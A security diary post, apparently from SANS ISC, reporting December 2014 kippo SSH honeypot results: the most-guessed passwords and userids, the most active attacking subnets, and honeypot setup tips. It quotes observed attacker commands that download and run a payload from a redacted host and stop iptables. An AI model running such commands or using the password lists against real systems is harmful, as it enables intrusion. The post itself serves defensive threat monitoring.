Honey Pot Entertainment - SSH

Published: 2014-12-27
Last Updated: 2014-12-27 16:43:43 UTC
by Mark Hofman (Version: 1)
6 comment(s)

The Christmas period is a nice time to play with some honeypots and share some of the info they have been collecting.  Currently I only have two functioning, both of them are located in the US. Each receives 20K or more login attempts per day. I'm using a standard kippo installation, running as a non root user and using authbind to run the honeypot on port 22.  Results are sent to a logging server for collection.   

One of the honeypots has no valid password so it will always fail I'm mainly interested in collecting the various userid and passwords used in the guessing attempts.  The other one does have a valid password and I regularly expand its interaction by providing the correct responses utilising the kippo capabilities.  The password can be changed by modifying the data/userdb.txt file in the kippo subdirectory.  The interaction can be improved by issuing a command and capturing the output and placing the resulting file in txtcmds directory.  For example sftp is often the first command issued. Locate where sftp is running from (usually /usr/bin).  Create the structure under the honeyfs directory, e.g. honeyfs/usr/bin/sftp. Issue the command sftp and capture the output to a file called sftp and place it in the txtcmds directory, follow the same structure so txtcmds/usr/bin/sftp.  Now when the command is entered it will get a response and hopefully you will get additional results.   

So some stats for December: 

  • Unique Passwords used: 136,029
  • Unique Userids used: 305 
  • Unique Atatcking IP Addresses: 343
Most common guessed password   Most Common Userid  
admin 1528 root 612564
123456 671 admin 13615
12344321 438 ubuntu 127
default 434 oracle 51
a1s2d3f4 433 test 41
root 430 ftpuser 31
q1w2e3 426 user 29
qwer1234 422 support 28
111111 420 ubnt 26
1q2w3e4r5t 417 guest 23


Dirtiest subnets

The following are the /24 subnets that are most active with a high number of hosts from the same subnet attacking.  

  • - HK, CN  - AS 63854
  • AS 4134  - https://isc.sans.edu/asreport.html?as=4134
    • - Huzhou, CN
    •  - Huzhou, CN
    • - Huzhou, CN
    • - Nanjing, CN
    •  - Nanjing, CN
    • 61.174.50 - Huzhou, CN
    • 61.175.51 - Huzhou, CN

​Based on the above I'm quite comfortable in saying that blocking anything coming from AS4134 would not be a bad idea. 


The passwords used in the attempts are quite varied and range from the simple as shown above to much more esoteric and complex passwords such as !!QAZ@@WSX##EDC, !!Er.HAA22a098yIGH@_Z@, %TGBVFR$#EDCXSW@, WORLDEDU20121123. 

Commands Issued

  • ls -la /var/run/sftp.pid
  • #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    • wget http://---snip---/install/8004
    • chmod +x 8004
    • ./8004
  • uname
  • service iptables stop


There has been some increase in scanning over the past month or so.  My previous Honeypot run in August 2014 would max out at 1500 attempts per day. The main surprise to me was the wide range of passwords being used.  A number of them seem to relate directly to specific types of hardware installed such as modem/routers.  Others look like quite robust passwords and may have come from the various password compromises this year.   The main message is that if you are running an SSH server it will get attacked and you'd best have some decent passwords and ideally use certificate authentication to secure the server.  

If you want to run your own, I'm a fan of kippo, it is simple to set up and there are plenty of guides on how to do it.  Make sure you run it on a box that is not a production device and secure it. You do not want to become a staging point for attacks.  

If you want to submit your kippo logs, Dr J in this diary https://isc.sans.edu/diary/New+Feature+Live+SSH+Brute+Force+Logs+and+New+Kippo+Client/18433 provides the perl to do so.  


Mark H - Shearwater

6 comment(s)


Diary Archives